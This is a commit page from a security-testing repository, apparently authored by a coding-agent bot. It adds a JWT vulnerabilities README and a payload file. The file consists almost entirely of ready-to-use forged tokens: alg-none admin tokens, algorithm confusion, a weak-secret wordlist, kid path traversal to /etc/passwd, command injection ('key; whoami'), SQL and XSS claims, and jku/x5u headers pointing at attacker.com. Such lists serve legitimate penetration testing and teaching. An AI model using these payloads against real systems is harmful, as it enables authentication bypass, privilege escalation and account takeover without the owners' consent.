0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add comprehensive payloads and 4 new vulnerability types (SSTI, HTTP Request Smuggling, CORS, JWT)

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 14:50:15 +00:00
parent f2209e214f
commit 68b76036df
13 changed files with 2368 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
JWT-Vulnerabilities/README.md
+47
View File
@@ -0,0 +1,47 @@
# JWT (JSON Web Token) Vulnerabilities
## Description
JWT vulnerabilities occur when JSON Web Tokens are improperly implemented or validated, allowing attackers to forge tokens, escalate privileges, or bypass authentication mechanisms. JWTs are widely used for authentication and authorization in modern web applications.
## Common Vulnerabilities
- **None Algorithm** - Setting `alg` to `none` to bypass signature verification
- **Algorithm Confusion** - Switching from RS256 to HS256
- **Weak Secret Key** - Using weak or default secrets for HMAC
- **Key Injection** - Injecting public key in JWK header
- **Token Expiration** - Missing or improper `exp` validation
- **SQL Injection in Claims** - Injecting SQL in JWT claims
- **XSS in Claims** - Storing and reflecting XSS payloads in JWT
## JWT Structure
```
header.payload.signature
```
- **Header**: Contains algorithm and token type
- **Payload**: Contains claims (user data)
- **Signature**: Cryptographic signature
## Common Attack Vectors
- Authentication endpoints
- Authorization headers
- Cookie-based JWT storage
- URL parameters with JWT
- Local/Session storage
## Impact
- Authentication bypass
- Privilege escalation
- Account takeover
- Access to unauthorized resources
- Identity spoofing
## Testing Approach
1. Decode the JWT to examine header and payload
2. Test with `alg: none` in header
3. Test algorithm confusion (RS256 → HS256)
4. Brute force weak secrets
5. Modify claims (user ID, role, permissions)
6. Test token expiration validation
7. Check for sensitive data exposure in payload
## Payloads
See `jwt-vulnerabilities-payloads.txt` for a comprehensive list of JWT attack payloads.
JWT-Vulnerabilities/jwt-vulnerabilities-payloads.txt
+259
View File
@@ -0,0 +1,259 @@
# JWT Vulnerabilities Payloads
# None Algorithm Attack
# Change alg to "none" and remove signature
# Original: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
# Modified: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"none","typ":"JWT"}
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"None","typ":"JWT"}
eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"NONE","typ":"JWT"}
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"nOnE","typ":"JWT"}
eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Algorithm Confusion Attack (RS256 to HS256)
# Change algorithm from RS256 to HS256 and sign with public key
# Header: {"alg":"HS256","typ":"JWT"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature_here
# Weak Secret Brute Force
# Common weak secrets to test
secret
password
123456
12345678
admin
test
jwt
key
default
secret123
password123
qwerty
abc123
letmein
changeme
welcome
monkey
12345
iloveyou
trustno1
dragon
# Modified Claims - Privilege Escalation
# Payload: {"user":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"role":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.
# Payload: {"admin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZX0.
# Payload: {"isAdmin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfQ.
# Payload: {"permissions":["admin","read","write","delete"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwZXJtaXNzaW9ucyI6WyJhZG1pbiIsInJlYWQiLCJ3cml0ZSIsImRlbGV0ZSJdfQ.
# User ID Manipulation
# Payload: {"userId":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjF9.
# Payload: {"sub":"1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIn0.
# Payload: {"id":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MX0.
# Token Expiration Bypass
# Payload: {"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjk5OTk5OTk5OTl9.
# Payload: No exp field
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"exp":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOm51bGx9.
# JWK Header Injection
# Header: {"alg":"RS256","typ":"JWT","jwk":{"kty":"RSA","kid":"key1","n":"...","e":"AQAB"}}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJrZXkxIiwibiI6Ii4uLiIsImUiOiJBUUFCIn19.payload.signature
# Kid Parameter Injection
# Header: {"alg":"HS256","typ":"JWT","kid":"../../public.key"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL3B1YmxpYy5rZXkifQ.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"/dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii9kZXYvbnVsbCJ9.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.payload.signature
# SQL Injection in Claims
# Payload: {"username":"admin' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluJyBPUiAnMSc9JzEifQ.
# Payload: {"user":"admin'--"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4nLS0ifQ.
# XSS in Claims
# Payload: {"name":"<script>alert(1)</script>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9.
# Payload: {"comment":"<img src=x onerror=alert(1)>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21tZW50IjoiPGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPiJ9.
# Empty Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Invalid Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.invalid
# JKU Header Injection (JWK Set URL)
# Header: {"alg":"RS256","typ":"JWT","jku":"https://attacker.com/jwks.json"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2p3a3MuanNvbiJ9.payload.signature
# X5U Header Injection (X.509 URL)
# Header: {"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/cert.pem"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1dSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2NlcnQucGVtIn0.payload.signature
# X5C Header Injection (X.509 Certificate Chain)
# Header: {"alg":"RS256","typ":"JWT","x5c":["MIIC..."]}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6WyJNSUlDLi4uIl19.payload.signature
# Critical Header Parameter Bypass
# Header: {"alg":"HS256","typ":"JWT","crit":["exp"],"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiZXhwIl0sImV4cCI6OTk5OTk5OTk5OX0.payload.signature
# Type Confusion
# Header: {"alg":"HS256","typ":"JWE"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXRSJ9.payload.signature
# Null Byte Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key\u0000admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleVx1MDAwMGFkbWluIn0.payload.signature
# Command Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key; whoami"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleTsgd2hvYW1pIn0.payload.signature
# Path Traversal in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../../etc/passwd"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QifQ.payload.signature
# SQL Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleScgT1IgJzEnPScxIn0.payload.signature
# Audience Manipulation
# Payload: {"aud":"admin-api"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhZG1pbi1hcGkifQ.
# Payload: {"aud":["admin","user","guest"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOlsiYWRtaW4iLCJ1c2VyIiwiZ3Vlc3QiXX0.
# Issuer Manipulation
# Payload: {"iss":"trusted-issuer"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ0cnVzdGVkLWlzc3VlciJ9.
# Not Before (nbf) Bypass
# Payload: {"nbf":0}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjB9.
# JWT ID (jti) Manipulation
# Payload: {"jti":"admin-token-123"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqdGkiOiJhZG1pbi10b2tlbi0xMjMifQ.
# Scope Escalation
# Payload: {"scope":"admin read write delete"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzY29wZSI6ImFkbWluIHJlYWQgd3JpdGUgZGVsZXRlIn0.
# Custom Claims Injection
# Payload: {"custom_role":"superadmin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjdXN0b21fcm9sZSI6InN1cGVyYWRtaW4ifQ.
# Payload: {"groups":["admin","developers","security"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJncm91cHMiOlsiYWRtaW4iLCJkZXZlbG9wZXJzIiwic2VjdXJpdHkiXX0.
# Numeric Value Manipulation
# Payload: {"level":999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6OTk5fQ.
# Payload: {"credit":999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjcmVkaXQiOjk5OTk5OX0.
# Boolean Manipulation
# Payload: {"verified":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2ZXJpZmllZCI6dHJ1ZX0.
# Payload: {"premium":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwcmVtaXVtIjp0cnVlfQ.
# Array Injection
# Payload: {"roles":["admin","superuser","root"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlcyI6WyJhZG1pbiIsInN1cGVydXNlciIsInJvb3QiXX0.
# Null Value Injection
# Payload: {"userId":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOm51bGx9.
# Negative Values
# Payload: {"userId":-1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOi0xfQ.
# Large Numbers
# Payload: {"userId":2147483647}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNDc0ODM2NDd9.
# Unicode Injection
# Payload: {"user":"admin\u0000"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW5cdTAwMDAifQ.
# Base64 URL Encoding Issues
# Missing padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Extra padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9==.eyJ1c2VyIjoiYWRtaW4ifQ==.signature==
# Standard base64 instead of base64url
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9+.eyJ1c2VyIjoiYWRtaW4ifQ/.signature+
# JWT Confusion with Session Tokens
# Use JWT where session token expected
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Empty JWT
..
# Malformed JWT
malformed.jwt.token
header.payload
.payload.signature
header..signature
# JWT in URL
https://target.com/api?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# JWT in Cookie
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Multiple JWTs
Authorization: Bearer jwt1, Bearer jwt2
# JWT with extra segments
header.payload.signature.extra
# Case-sensitive Algorithm
# Header: {"alg":"hs256","typ":"JWT"}
eyJhbGciOiJoczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
# Header: {"alg":"Hs256","typ":"JWT"}
eyJhbGciOiJIczI1NiIsInR5cCI6IkpXVCJ9.payload.signature